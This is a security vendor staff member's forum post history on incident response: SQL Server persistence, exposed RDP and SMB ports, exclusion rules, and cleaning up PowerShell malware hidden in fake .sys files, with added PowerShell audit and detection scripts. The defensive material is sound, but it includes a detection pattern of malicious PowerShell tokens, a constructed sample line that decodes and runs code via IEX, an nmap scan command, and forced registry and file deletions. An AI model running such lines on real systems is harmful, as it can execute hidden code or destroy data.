JamesR (ESET Staff)

Everything posted by JamesR

  1. From @Artemis AWAD's description, I made an exclusion (which matches @thae's exclusion). I added some notes to mine to help explain the flow of logic. If this does not work, we will need the following info:

Which Rule or Rules are being triggered by these commands?
Sometimes you need to add an <operations> section, which is a bit more advanced to create.

An example of the Triggering Event
Open the details of a detection, and scroll down to the "Triggering Process" section. Provide this as a screenshot and blur out any sensitive data.

Notes or Screenshot of Parent to Child relationship
If the parent to PowerShell or CMD is always the same, it could be used to make the exclusion more specific.

```xml
<definition>
  <process>
    <!-- Single 'OR' Statement which contains a list of processes -->
    <operator type="OR">
      <operator type="AND">
        <!-- PowerShell Process which can run your PS1 script -->
        <condition component="FileItem" property="FileName" condition="is" value="powershell.exe" />
        <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.ps1" />
      </operator>
      <operator type="AND">
        <!-- CMD Process which can run your BAT script -->
        <condition component="FileItem" property="FileName" condition="is" value="cmd.exe" />
        <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.bat" />
      </operator>
    </operator>
  </process>
</definition>
```
  2. @3D Joe Ng While hardening your SQL Server is a very good idea, there is a good chance that persistence was already added to the SQL server and that detections by ESET will continue until the persistence is removed. In my last DM to you, I provided a simple way to log SQL persistence. Were you able to run the final batch file I provided? If yes, can you please supply the zip file generated?

There are many types of SQL persistence, and if your MS SQL is hosting more than one instance, each instance will need to be checked. There are the following types of MS SQL persistence:

Stored Procedures
- At start of the MS SQL service, a procedure will start and execute every certain amount of seconds/minutes/hours.
- A stored procedure can be "encrypted" to hide its definition from being easily seen.
- More info on Stored Procedures here: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Triggers
- DDL Triggers - Data Definition Language Triggers
  - Server based triggers which can be set to execute when specific queries like CREATE, ALTER, or DROP are used.
  - These triggers can be "encrypted" to hide the definition from being easily seen.
- DML Triggers - Data Manipulation Language Triggers
  - Database based triggers which can be set to execute on specific queries like INSERT, UPDATE, or DELETE.
  - Untested if these can be "encrypted", but it should be assumed that they can be encrypted as well.
- Logon Triggers
  - As their name implies, these are triggers which execute queries whenever a user logs in to MS SQL. And can, theoretically, prevent a user from logging in.
  - Untested if these can be "encrypted", but it should be assumed that they can be encrypted as well.
- More info on Triggers here: https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/

Other notes
In order to allow MS SQL to execute external applications, the use of advanced options is needed. You will want to check and disable these settings (ensure you make note of what you changed, and monitor your SQL server for any issues afterwards. Your SQL server may have legitimately been using these settings):
- "show advanced options" - Allows the following settings to be used.
- "xp_cmdshell" - Allows MS SQL to directly execute external applications like Ping.exe or any other executables on disk.
- "Ole Automation Procedures" - Allows MS SQL to execute Windows Script Host and VBScript macros, which allows wscript.shell to execute other executables on the computer's disk, without the use of xp_cmdshell.
- "clr enabled" - Allows you to store .NET code inside of SQL which can be executed by a stored procedure. This is one of the more powerful ways of providing code execution to SQL. But these should easily be spotted when reviewing all stored procedures on a server.
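An added example, not from the original post and not an ESET tool: a read-only PowerShell audit that enumerates the persistence points listed above on one instance (startup stored procedures in master, server-scoped DDL and logon triggers, database-scoped DDL and DML triggers, and the sp_configure settings that allow external execution). It reports whether a module was created WITH ENCRYPTION (its definition is NULL in the sql_modules views). The function and variable names are mine, the default instance name `localhost` is a placeholder, and it assumes Windows authentication with a login that can read object definitions (sysadmin sees everything) and System.Data.SqlClient, which Windows PowerShell 5.1 and PowerShell 7 on Windows provide.

```powershell
# Added example (not from the original post or ESET). Read-only audit of MS SQL
# persistence points on one instance. Run it once per instance (e.g. 'HOST\INSTANCE').
param([string]$Instance = 'localhost')   # hypothetical default; pass each instance explicitly

function Invoke-AuditQuery([string]$Query) {
    # Connect to master with Windows authentication; every query below runs in that context
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList `
        "Server=$Instance;Database=master;Integrated Security=True;Encrypt=False;Connection Timeout=15"
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand(); $cmd.CommandText = $Query
        $table = New-Object System.Data.DataTable
        $table.Load($cmd.ExecuteReader())
        return ,$table                               # comma keeps the DataTable intact
    } finally { $conn.Close() }
}

# Startup procedures live in master; WITH ENCRYPTION leaves definition NULL in sys.sql_modules.
# CLR procedures have no sys.sql_modules row at all, so only SQL modules are checked for encryption.
$startupProcs = @'
SELECT p.name, p.type_desc,
       CASE WHEN p.type_desc = 'SQL_STORED_PROCEDURE' AND m.definition IS NULL THEN 1 ELSE 0 END AS is_encrypted,
       p.create_date, p.modify_date
FROM sys.procedures AS p LEFT JOIN sys.sql_modules AS m ON m.object_id = p.object_id
WHERE p.is_auto_executed = 1;
'@
# Server-scoped triggers: fires_on shows the DDL event (e.g. CREATE_LOGIN) or LOGON
$serverTriggers = @'
SELECT t.name, t.type_desc, e.type_desc AS fires_on, t.is_disabled,
       CASE WHEN t.type_desc = 'SQL_TRIGGER' AND m.definition IS NULL THEN 1 ELSE 0 END AS is_encrypted,
       t.create_date, t.modify_date
FROM sys.server_triggers AS t
JOIN sys.server_trigger_events AS e ON e.object_id = t.object_id
LEFT JOIN sys.server_sql_modules AS m ON m.object_id = t.object_id;
'@
# Database-scoped triggers: parent_class_desc DATABASE = DDL trigger, OBJECT_OR_COLUMN = DML trigger
$dbTriggers = @'
SELECT DB_NAME() AS database_name, t.name, t.parent_class_desc, t.type_desc, t.is_disabled,
       CASE WHEN t.type_desc = 'SQL_TRIGGER' AND m.definition IS NULL THEN 1 ELSE 0 END AS is_encrypted,
       t.create_date, t.modify_date
FROM sys.triggers AS t LEFT JOIN sys.sql_modules AS m ON m.object_id = t.object_id;
'@
# The four settings named in the post; 'running' is the value currently in effect
$execSettings = @'
SELECT name, CAST(value AS int) AS configured, CAST(value_in_use AS int) AS running
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
'@

$report = [ordered]@{
    StartupProcedures = Invoke-AuditQuery $startupProcs
    ServerTriggers    = Invoke-AuditQuery $serverTriggers
    ExecutionSettings = Invoke-AuditQuery $execSettings
}
# Database triggers must be queried inside each database; a ] in a name is escaped as ]]
$report['DatabaseTriggers'] = foreach ($db in (Invoke-AuditQuery "SELECT name FROM sys.databases WHERE state_desc = 'ONLINE';").Rows) {
    $name = $db.name -replace '\]', ']]'
    try   { (Invoke-AuditQuery ("USE [$name];`r`n" + $dbTriggers)).Rows }
    catch { Write-Warning "Could not read triggers in [$name]: $($_.Exception.Message)" }
}

foreach ($section in $report.Keys) {
    "=== $section ==="
    $report[$section] | Format-Table -AutoSize | Out-String -Width 220
}
foreach ($row in $report['ExecutionSettings'].Rows) {
    if ($row.running -ne 0) { Write-Warning "'$($row.name)' is enabled on $Instance" }
}
```

Rows with is_encrypted = 1, or triggers and startup procedures you did not create, are the ones to pull definitions for (or drop). Disabling a setting is deliberately left to the admin, for example `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;`, since the post's caveat applies: note what you changed and watch the instance afterwards.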
  3. I do not recommend simply changing the port any service uses. It is too simple to run a port scan on all ports to identify the service which is running on them, and it does not stop an attack on any service which is exposed to the internet. It would be better to close easily brute forced ports/services off from any inbound public IPs. If you do need to have the port open to the internet, it should be restricted only to allow specific public IP addresses; otherwise, you will end up having password guessing attacks occur. This holds true for SQL, RDP, SMB, SSH, and many, many other services. If you change the default port, and expose it to the internet, you have opened the door to being attacked.
  4. @3D Joe Ng I will be sending you a direct message shortly with some steps to help you move closer to a clean environment. What you have looks to be an MS SQL persistent threat. These are not a simple clean up. These occur when MS SQL management ports (1433-1434) are exposed to the internet, and administrative credentials are successfully guessed and used. The way MS SQL persistence works is that it can execute commands and/or scripts using an assortment of Stored Procedures which will either execute at certain time intervals or when certain actions occur on a SQL server. This can make them feel like they are scheduled tasks. What leads me to believe this is an SQL persistent threat? It's because one of your screenshots shows the main SQL process is involved in causing the detection (.\sqlservr.exe).
  5. FTL, Thanks for the additional info. It's starting to sound like your server may be hosting Remote Desktop Services with Remote Desktop Gateway, which will have ntoskrnl.exe listening on port 443 for RDP requests to forward to other servers. While this might be intended, the trigger event info you shared shows an IP from Russia attempting the connection (I used this site to look up the location of the IP address: https://www.maxmind.com/en/geoip-demo). I highly recommend reviewing the roles installed on the server to verify if "Remote Desktop Services" (previously called Terminal Services) is one of the installed roles. These detections could very well be a sign of an RDP Brute Force attack from undesired IP addresses. If this server is an RDP Gateway, and 443 needs to be open to the internet, I would recommend restricting which blocks of IPs you allow to connect. Geo-IP Blocking could help reduce connections from attackers, but any compromised device in your country could continue an attack. And ensure you are using 2FA on any RDP logins (especially Admin logins). With that said, there is still a chance it's not Remote Desktop Services with an RDP Gateway. That is just what I would expect at this point.

If you have a list of IP Addresses which are allowed to connect, that you want to exclude from triggering this detection, you can use the following exclusion as a template to modify and meet your needs. Then you will only get detections on untrusted IP addresses:

```xml
<definition>
  <process>
    <!-- Describe process to apply exclusion to -->
    <operator type="and">
      <!-- SignatureType of 90 = Trusted -->
      <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/>
      <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\ntoskrnl.exe" />
      <condition component="ProcessInfo" property="ProcessOwner" condition="is" value="nt authority\system"/>
    </operator>
  </process>
  <operations>
    <operation type="TcpIpProtocolIdentified">
      <!-- List of IP Addresses to exclude from triggering detection. Accepts CIDR notation. -->
      <operator type="or">
        <condition component="Network" property="IpAddressV4" condition="is" value="172.16.0.0/12" />
        <condition component="Network" property="IpAddressV4" condition="is" value="192.168.5.123" />
      </operator>
    </operation>
  </operations>
</definition>
```

Side note: RDP can be brute forced, and it's not uncommon for someone to have set up a secondary admin account, with a weaker password and no 2FA, to use in case their primary account is not working (disabled due to bad passwords, or 2FA isn't functioning as expected). It is not uncommon that a ransomware attack starts with a form of brute force on exposed services (RDP, SMB, vCenter/ESXi web console, etc...). Also, if some form of Remote Code Execution is discovered, or only known to attackers, it could allow them to walk right in without authentication (In 2017 WannaCry used an RCE on SMB to spread without needing any credentials).
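An added example, not from either post and not ESET Inspect's rule engine: a small PowerShell evaluator that walks the `<definition>` XML of the two exclusions in this thread (post 1, an OR of two AND groups on the process, and post 5, process conditions plus an `<operations>` block matching source IPs with CIDR) and shows which constructed sample events each one would exclude. It implements only the three condition types those exclusions use (`is`, `contains`, `greaterOrEqual`). Its assumptions are mine: event fields are keyed as `Component.Property`, `%SYSTEM%` stands for `C:\Windows\System32`, and when `<operations>` is present an event is excluded only if its operation type is listed there and that operator matches.

```powershell
# Added example, not from the original posts and not ESET's own engine; the semantics
# below are assumptions made for illustration (see lead-in).

function ConvertTo-IpNumber([string]$Ip) {
    $b = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    return ([int64]$b[0] -shl 24) -bor ([int64]$b[1] -shl 16) -bor ([int64]$b[2] -shl 8) -bor [int64]$b[3]
}

function Test-IpInRange([string]$Address, [string]$Range) {
    # $Range is 'a.b.c.d' or 'a.b.c.d/prefix' (the CIDR form the post says the rule accepts)
    if (-not $Address) { return $false }
    $net, $prefix = $Range -split '/', 2
    if (-not $prefix) { $prefix = 32 }
    $mask = ([int64]1 -shl 32) - ([int64]1 -shl (32 - [int]$prefix))   # e.g. /12 -> 0xFFF00000
    return ((ConvertTo-IpNumber $Address) -band $mask) -eq ((ConvertTo-IpNumber $net) -band $mask)
}

function Test-Condition([System.Xml.XmlElement]$Node, [hashtable]$Event) {
    $key  = '{0}.{1}' -f $Node.component, $Node.property
    $have = $Event[$key]
    $want = $Node.value -replace '%SYSTEM%', 'C:\Windows\System32'   # assumption: EI expands %SYSTEM%
    switch ($Node.condition) {
        'is' {
            if ($Node.property -eq 'IpAddressV4') { return (Test-IpInRange $have $want) }
            return ([string]$have -eq [string]$want)          # -eq on strings is case-insensitive
        }
        'contains'       { return (([string]$have).IndexOf([string]$want, [StringComparison]::OrdinalIgnoreCase) -ge 0) }
        'greaterOrEqual' { return ([int]$have -ge [int]$want) }
        default          { throw "Unsupported condition type '$($Node.condition)'" }
    }
}

function Test-Operator([System.Xml.XmlElement]$Node, [hashtable]$Event) {
    $results = foreach ($child in $Node.ChildNodes) {   # comments are skipped by the switch
        switch ($child.LocalName) {
            'operator'  { Test-Operator $child $Event }
            'condition' { Test-Condition $child $Event }
        }
    }
    switch ($Node.type) {
        'and'   { return (@($results) -notcontains $false) }
        'or'    { return (@($results) -contains $true) }
        default { throw "Unsupported operator type '$($Node.type)'" }
    }
}

function Test-Exclusion([xml]$Definition, [hashtable]$Event) {
    $procOp = $Definition.SelectSingleNode('/definition/process/operator')
    if (-not (Test-Operator $procOp $Event)) { return $false }
    $ops = $Definition.SelectNodes('/definition/operations/operation')
    if ($ops.Count -eq 0) { return $true }                   # no <operations>: process match is enough
    foreach ($op in $ops) {
        if ($op.type -eq $Event['Operation']) { return (Test-Operator ($op.SelectSingleNode('operator')) $Event) }
    }
    return $false
}

$post1 = [xml]@'
<definition><process><operator type="OR">
  <operator type="AND">
    <condition component="FileItem" property="FileName" condition="is" value="powershell.exe" />
    <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.ps1" />
  </operator>
  <operator type="AND">
    <condition component="FileItem" property="FileName" condition="is" value="cmd.exe" />
    <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.bat" />
  </operator>
</operator></process></definition>
'@
$post5 = [xml]@'
<definition>
  <process><operator type="and">
    <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/>
    <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\ntoskrnl.exe" />
    <condition component="ProcessInfo" property="ProcessOwner" condition="is" value="nt authority\system"/>
  </operator></process>
  <operations><operation type="TcpIpProtocolIdentified"><operator type="or">
    <condition component="Network" property="IpAddressV4" condition="is" value="172.16.0.0/12" />
    <condition component="Network" property="IpAddressV4" condition="is" value="192.168.5.123" />
  </operator></operation></operations>
</definition>
'@

# Constructed sample events (not real telemetry)
$kernel = @{ 'Module.SignatureType' = 90; 'FileItem.FullPath' = 'C:\Windows\System32\ntoskrnl.exe'
             'ProcessInfo.ProcessOwner' = 'NT AUTHORITY\SYSTEM'; 'Operation' = 'TcpIpProtocolIdentified' }
$samples = @(
    @{ Name = 'MyScript.ps1 via PowerShell'; Def = $post1; Event = @{ 'FileItem.FileName' = 'powershell.exe'; 'ProcessInfo.CommandLine' = 'powershell.exe -ep bypass -f C:\Scripts\MyScript.ps1' } }
    @{ Name = 'other.ps1 via PowerShell';    Def = $post1; Event = @{ 'FileItem.FileName' = 'powershell.exe'; 'ProcessInfo.CommandLine' = 'powershell.exe -f C:\Temp\other.ps1' } }
    @{ Name = 'MyScript.bat via cmd';        Def = $post1; Event = @{ 'FileItem.FileName' = 'cmd.exe'; 'ProcessInfo.CommandLine' = 'cmd.exe /c C:\Scripts\MyScript.bat' } }
    @{ Name = 'RDP from 172.20.1.15 (LAN)';  Def = $post5; Event = $kernel + @{ 'Network.IpAddressV4' = '172.20.1.15' } }
    @{ Name = 'RDP from 203.0.113.7';        Def = $post5; Event = $kernel + @{ 'Network.IpAddressV4' = '203.0.113.7' } }
)
foreach ($s in $samples) { '{0,-30} excluded = {1}' -f $s.Name, (Test-Exclusion $s.Def $s.Event) }
```

The first, third and fourth samples come back excluded and the other two do not, which is the behaviour both posts describe: a `contains` on the command line only matches the named script, and with the `<operations>` block only listed addresses are suppressed, so a public IP still produces a detection.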
  6. This could be a sign of being port scanned from the outside world. It is not uncommon to see port scans attempting to identify what service is available on each port. This means that something is testing non-standard RDP ports to see if RDP is running. Basically the equivalent of running "nmap -sV -Pn -p 445 %YourPublicIP%" where the port number does not have to be 445, but could be a range of ports, or a different port. But I am unable to tell which port, if this is what the EI Rule triggered on, or if this was Inbound or Outbound traffic from a public or private IP. As it is the ntoskrnl.exe process, I assume it's potentially inbound on 445 or something else.

If you log into the EI Console, then navigate to the main "Detections" section (on the left):
- Clear any un-needed filters, and set the filters to:
  - Resolved = Unchecked
  - Rule Name = [E0517]
  - First drop down list on top left = Ungrouped
- Next we will add a column by clicking the gear on the far right, then clicking "Select Columns" and choose the following column and then click OK: Trigger Event
- Scroll to the right and locate the "Trigger Event" column

This will give you a nice list to look at where you can easily see:
- If it is "Inbound/Outbound"
- If a "Private or Public IP" was involved
- What port was involved

If it is inbound from a Public IP, it means the identified Port is exposed to the internet and the identified IPs are testing if RDP is running on that port. If it is port 445, it should be closed off from the internet immediately.

If it is inbound from a Private IP, it means that private IP is potentially performing a port scan or has some software which is not using a standard protocol to communicate with other computers. Or that you have altered the default RDP port on your network, and should follow Marcos' advice.

If it is outbound and mstsc.exe is the process causing the detection (which is not shown in the data you shared), then you should just verify if you allow users to connect to RDP servers on non-standard ports and potentially lock down the protocol.

Hopefully this helps. There could be more possibilities than what I listed, but I commonly do see where customers did not realize they had ports like 445 exposed to the world, and EI helped to point that out for them.
  7. @j-gray I've pinged some people internally to get the communication on that case moving.
  8. These symptoms are not likely due to the infection, but I do have some steps for you to try before contacting your Internet Provider. According to the logs we gathered previously, you are using your home router/wifi device for DNS and one IPv6 address for DNS. That means I would apply the following troubleshooting steps:

1. Attempt to power off and on your router/wifi and modem. This may clear it up. If this works, stop here. No need to continue.
2. Set your computer to use specific DNS servers like Google DNS. Here are steps to try seeing if this helps:
   1. Windows key + R
   2. Type in: ncpa.cpl and press enter
   3. Right-click on the following network name and select Properties: イーサネット (Ethernet)
   4. Find "TCP/IPv4" and right click it and select properties.
   5. Click "Advanced" then click on the DNS tab
   6. Make note of any DNS servers listed (in case you need to put them back in), then remove each one.
   7. Next click Add, and add the following one at a time. Then click OK to all of the windows and test if your internet has stabilized.
      8.8.8.8
      8.8.4.4
3. If your internet still is not stable, repeat the steps above, but at step "4. Find TCP/IPv4...", instead find "TCP/IPv6" and click properties, then Advanced > DNS and remove all DNS, and add the following 2 addresses one at a time:
   2001:4860:4860::8888
   2001:4860:4860::8844
4. If this still does not work, then you will need to contact your internet service provider to perform more troubleshooting or even default/reset your router/wifi or modem to factory defaults. Also, if this does not work, do not forget to set your DNS back to what it was before.

If this does work, and you do not wish to use Google DNS, you can find many alternatives, or contact your Internet Provider to obtain the DNS Addresses they would normally provide.

Side Note: Some may not like that I am having you test with Google DNS. This is just a test and feel free to use other DNS servers as you wish. In my opinion, Google DNS is just simpler to type IP Addresses for quick testing purposes, with less chance of a typo causing a problem.
  9. "What you should do next" comes down to: Are you still seeing new detected threats by ESET? Are you still seeing PowerShell processes start? If the answer is "No" to both of the above, you are all cleaned up, and I would recommend re-running scans for the next few days...just to ensure your computer stays clean. If the answer is "Yes" to any of the above, we will need a fresh set of logs to see how behavior has changed.
  10. @itman They were not drivers. They were text files containing PowerShell scripting and saved as .sys files. Just a simple technique to try and hide on a system. I always advise against relying on a file name and/or file path to decide what a file contains or is. In this case, the malware is reading the contents of the .sys files, and converting them to UTF8 to get PowerShell code to execute. Here is a snippet of the command being executed to read from the file, prior to executing the contents.
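An added example, not from the original post: a PowerShell check for the trick described above, files that carry a .sys name but are not PE images. It reads each .sys file under a folder, tests for the "MZ" header every real driver starts with, decodes the bytes as UTF-8 the same way the malware does, and looks for PowerShell-looking tokens in the result. The function name, the token list (a heuristic of mine) and the two sample files are all mine; the samples are constructed in a temp folder, and the "driver" among them is only an MZ header with zero padding, not a real driver, so its Authenticode status is reported as NotSigned.

```powershell
# Added example (not from the original post). Finds .sys files that are not PE images
# and read like PowerShell once decoded as UTF-8.

function Find-FakeDriverFile {
    param([string]$Path = "$env:SystemRoot\System32\drivers")
    # Heuristic token list (my choice): assignment, IEX, base64 decode, download/launch helpers
    $psTokens = '(?i)(\$\w+\s*=|Invoke-Expression|\bIEX\b|FromBase64String|New-Object|DownloadString|Start-Process|-EncodedCommand)'
    foreach ($file in Get-ChildItem -LiteralPath $Path -Recurse -File -Filter *.sys -ErrorAction SilentlyContinue) {
        $bytes = [System.IO.File]::ReadAllBytes($file.FullName)
        # Every genuine driver is a PE image and therefore starts with 'MZ' (0x4D 0x5A)
        $hasMz = ($bytes.Length -ge 2) -and ($bytes[0] -eq 0x4D) -and ($bytes[1] -eq 0x5A)
        # Same decoding step the malware performs before executing the content
        $text  = [System.Text.Encoding]::UTF8.GetString($bytes)
        $hits  = @([regex]::Matches($text, $psTokens) | ForEach-Object { $_.Value } | Sort-Object -Unique)
        [pscustomobject]@{
            Path           = $file.FullName
            Size           = $bytes.Length
            HasMzHeader    = $hasMz
            Signature      = (Get-AuthenticodeSignature -LiteralPath $file.FullName).Status.ToString()
            PowerShellHits = ($hits -join ',')
            Suspicious     = (-not $hasMz) -and ($hits.Count -gt 0)   # not a PE image and reads like a script
        }
    }
}

# Demo on two constructed files in a temp folder
$demo = Join-Path ([System.IO.Path]::GetTempPath()) 'fake-sys-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
# Constructed sample 1: PowerShell text saved under a .sys name (never executed here)
[System.IO.File]::WriteAllText((Join-Path $demo '1A2B3C4D.sys'),
    '$p = [Convert]::FromBase64String("VGVzdA=="); IEX ([Text.Encoding]::UTF8.GetString($p))')
# Constructed sample 2: MZ header plus zero padding, standing in for a genuine (PE) driver
$pe = New-Object byte[] 64; $pe[0] = 0x4D; $pe[1] = 0x5A
[System.IO.File]::WriteAllBytes((Join-Path $demo 'notreal.sys'), $pe)

Find-FakeDriverFile -Path $demo | Format-Table Path, HasMzHeader, Signature, PowerShellHits, Suspicious -AutoSize
# Real run against the drivers folder: Find-FakeDriverFile | Where-Object Suspicious
```

In the demo only 1A2B3C4D.sys is flagged (no MZ header, hits on `$p =`, FromBase64String and IEX). On a live system the header test is the decisive one; the signature column is supporting context, since a legitimately catalog-signed driver may also show NotSigned depending on the PowerShell version.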
  11. @mohu From looking at your logs, I can see 17 scheduled tasks which will start an assortment of wscript or powershell commands. To quickly clean this up, and to gather samples of all parts of this (including the .ps1 files Marcos asked for), follow these instructions.

1. Open cmd as admin (in the Windows search, type "CMD", then hold "CTRL + Shift" and tap "Enter" while holding those keys).
2. Paste in the commands at the bottom of this post and press enter (this will make copies of many files to a folder on your desktop named "findRegistryTaskCache"). To paste into the CMD window, simply right click into the window. This should paste them.
3. After the commands complete execution (they should complete fairly quickly, ignore any errors), reboot as soon as possible.
4. After reboot, locate the "findRegistryTaskCache" folder on your desktop, right click, and send to zip and attach in a reply here.

Commands to copy:

```batch
MKDIR "%UserProfile%\Desktop\findRegistryTaskCache"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{236BB709-E2AF-4247-9C7E-57914DEE2329}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{236BB709-E2AF-4247-9C7E-57914DEE2329}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\06892F7F-5E7E-46F1-8BE6-EAFC65B2BFBD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\31510FF6-8D8E-4394-9A40-C44009BC2BFC.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EDCA282-2EB6-4AAA-952E-C56A9583A995}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EDCA282-2EB6-4AAA-952E-C56A9583A995}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\D4A3F8CD-4E7A-49AB-9064-1508D4EA5A6A" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\65978E5F-8827-48F0-820A-8EB8709650AF.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F725CEF-48E1-4654-8D76-285E86CFE030}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F725CEF-48E1-4654-8D76-285E86CFE030}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" /f /q
copy /Y /B "C:\Windows\System32\QJTZngJ\3D83AE2B-6318-4D11-BD2D-2E39A341CCC3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\zzcSFeCHTT\4515CFF0-D014-44F2-BABD-8EA2C1F816CE.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AB6E1CC-84CE-4E81-9A00-873FB08D7DAA}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AB6E1CC-84CE-4E81-9A00-873FB08D7DAA}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" /f /q
